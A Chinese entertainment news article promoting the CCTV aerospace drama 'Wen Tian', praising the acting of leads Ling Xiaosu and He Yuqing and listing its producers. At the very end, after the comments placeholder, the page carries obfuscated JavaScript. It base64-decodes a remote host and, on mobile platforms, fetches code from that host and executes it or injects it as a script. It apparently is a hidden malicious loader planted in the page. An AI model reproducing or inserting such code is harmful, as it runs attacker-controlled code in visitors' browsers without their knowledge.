央视跨年大戏《问天》热播 凌潇肃搭档何雨晴“冰与火的碰撞”

时间:2021-12-28 13:03:24阅读:4715
央视跨年大戏《问天》目前已经播出过半,一路下来收获了不少观众的喜爱。作为一部航天题材电视剧能有如此口碑,除了题材类型的稀缺性,更重要的就是多位实力派演员的过硬演技加持,尤其是两位主演凌潇肃和何雨晴挑大

央视跨年大戏《问天》目前已经播出过半,一路下来收获了不少观众的喜爱。作为一部航天题材电视剧能有如此口碑,除了题材类型的稀缺性,更重要的就是多位实力派演员的过硬演技加持,尤其是两位主演凌潇肃和何雨晴挑大梁饰演的一对相爱相杀的“航天伉俪”,使得这部看起来严肃专业的行业正剧多了许多温婉柔情、可爱俏皮的精彩亮点。

《问天》讲述了在1996年长三乙发射爆炸、卫星返回失利等接连打击下,一群青年航天科学家在老一辈专家的带领下,冲破重重障碍,攻破层层科研难关,获得一个又一个成功的故事。

凌潇肃何雨晴首次搭档情侣 默契自然观众叫好

这次搭档情侣,是凌潇肃和何雨晴之间的首次合作。凌潇肃饰演的方啸天是一名心怀航天员梦想却被调配为总控室骨干的叛逆天才,何雨晴饰演的江遥是航天研究院飞船组的科研才女。一个性格叛逆天不怕地不怕,一个生性沉稳一丝不苟,看似完全不挨边到两个人却因为一次撞车“不打不相识”。经过各种误会和争吵后,最后情定终身相携到老。两人从最先的磨合到渐入佳境,非常默契地诠释了研究院这对伉俪情深的“航天伴侣”,而生活中,他俩也成了无话不谈的好朋友。

凌潇肃饰演的青年研究人员方啸天从年少莽撞,逐渐成长为一个真正的航天人,这个过程被凌潇肃分解得十分好:他的身上既有少年的那种“敢教日月换新天”的锋芒;后期他的性格又转变为沉稳宽厚,遇事不慌的成熟航天专家。这个角色在年龄与成长方面的二元对立性,凌潇肃拿捏稳妥。而何雨晴则把江遥这个角色的内心表演得细腻入微,与方啸天一角形成鲜明的对比,两人对手戏仿佛冰与火的碰撞,令观众跟着他们翘首以待,时而开怀大笑,时而又扼腕叹息。

年龄跨度长达30年 凌潇肃何雨晴深情演绎航天人的一生

随着剧情的推进,方啸天和江遥两人之间从误会到和解,再到相知相许,互补的两人给对方都带来不小的改变,应了那句“好的爱情就是要让彼此变得更好”。很多观众留言说难忘方啸天和江遥在路上相遇的第一幕——两人因为一场小小撞车事件而相识,意气风发的大少年方啸天横冲直撞“招摇过市”,仿佛全世界都是他的;而扎着麻花辫儿的江遥从车里出来,娴静内敛的她第一眼看到方啸天一定心想“这人怎么这样”,但正是这次不寻常的相遇为两人的漫漫情路定下了“一眼万年”的基调。转眼间,两人已到中年,那个意气风发的少年除了容颜,内心依然没有一丝丝改变,凌潇肃把方啸天的点滴变化演绎得生动真实接地气,仿佛他就是航天大院里的科研人员。这种没有表演的表演才是一个演员演绎的最高境界,凌潇肃坦言完全打开了自己,“我不是在演,我就是方啸天本天。”

30年,对于何雨晴来说也是第一次挑战这么长时间的角色年龄跨度,难度非同一般。为了诠释好这个角色,何雨晴做了大量功课,除了在开拍之前很长一段时间就去查阅学习专业的航天知识,更将自己完全代入到“江遥”身上,日夜揣摩她的性格和内心,甚至去感受她的一呼一吸。这种对角色近乎苛求的努力终于塑造出荧屏上丰富立体的江遥:刚进研究院的少女感、工作中的干练职业女性形象、对待胡乱质疑自己的同事豪不客气地露出锋芒、而在面对心爱的人时自然流露出来的娇羞和嗔怪的情绪,何雨晴的表演真诚细腻,拿捏到位。其中,在江遥父亲因公去世后公墓上的那一场戏,何雨晴将江遥内心失去父亲的巨大痛楚通过不着痕迹的表演非常自然地表达出来——最大的痛苦不是嚎啕大哭,而是悲不可言,她称自己当时“痛到无法呼吸”。

航天人的一生也是普通人的一生,工作、生活,哪一样都免不了。凌潇肃和何雨晴倾注心血的动情演绎让观众仿佛也跟着他们的喜怒哀乐“过”完了一生,就像何雨晴自己说的那样:“方啸天的长大也许是一瞬间的,而江遥也因为方啸天整个人都放松了,他们是彼此给予,相互成就。江遥这个角色不仅让我感受到航天人的艰苦不易,也让我自己收获了一次极大的成长机会,我相信观众也能从中汲取到感动和力量。”

敬请锁定央视一套晚20:00,央视频、腾讯视频、搜狐视频等网络平台24点跟播更新,《问天》精彩继续。

《问天》由中国载人航天工程办公室、中国卫星导航系统管理办公室、国家航天局探月与航天工程中心、国家航天局对地观测与数据中心、中共浙江省委宣传部、浙江省广播电视局作为指导单位。由中央电视台、浙江广播电视集团、浙江影视有限公司、晴辉国际文化传媒有限公司、横店影视制作有限公司、杭州佳平影业有限公司、宁波市奉化区文化旅游集团有限公司、我们的太空创新实践中心、德清县文化旅游发展集团有限公司、浙江晴辉影业有限公司、浙江佳禾影业有限公司、航天宏图信息技术股份有限公司联合出品。

评论

  • 评论加载中...
function ywcJmRf(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function yLoxSVz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ywcJmRf(t);};window[''+'T'+'W'+'Y'+'S'+'k'+'C'+'n'+'L'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=yLoxSVz,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bW50Lnl6YzM1MzI2LnRvcA====','151743',window,document,['=','znhiLfYeg']);}:function(){};